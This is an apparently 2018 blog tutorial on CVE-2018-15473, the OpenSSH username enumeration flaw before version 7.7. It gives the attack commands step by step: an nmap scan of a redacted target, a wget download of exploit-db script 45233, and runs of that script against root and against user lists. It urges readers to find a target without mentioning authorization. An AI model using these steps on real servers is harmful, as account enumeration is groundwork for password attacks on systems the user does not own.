by hash3liZer . 26 August 2018
A small defect in OpenSSH server was recently exposed by researchers where they were able to enumerate the registered usernames on the server by exploiting the way the server behaves on forged requests. As of a username that doesn't exist the server would respond with an authentication failure while in the case the user exists, the scenario would be different. This little misconfiguration leads to the username enumeration and all OpenSSH versions prior to 7.7 are vulnerable.
Tough the patch has been released but as of the large audience, this could take at least months to settle down everything back to normal. What can an attacker do is simply compile a list and perform a mass-enumeration attack on the server and with the help with enumerated usernames, similar proceedings can be done for the password too.
The vulnerability is assigned the ID: CVE-2018-15473. So, we gonna test a server has OpenSSH installed.
There are so many usernames that could be enumerated. Moreover, it could also be helpful in finding some peculiarities that could only be suitable for certain environments.
Let's better be get going:
Find yourself a target server. Do a port scan and look for any OpenSSH services available prior to version 7.7. I've already one and to hide the identity, I'll be using the name redacted.com instead of the real domain. Here's what I got from the nmap scan:
$ nmap -sS -sV -O redacted.com
The exploit is available on exploit-db under the id 45233 written by Justin Gardner.
$ wget https://www.exploit-db.com/download/45233.py
Fire the script:
$ python 45233.py --port [port] --username [username] redacted.com # OR in case of a list $ python 45233.py --port [port] --userList [/path/to/file] --threads 10 redacted.com
In our case, we got:
$ python 45233.py --port 2222 --username root redacted.com
Be alerted and always try to keep all of your applications up to date.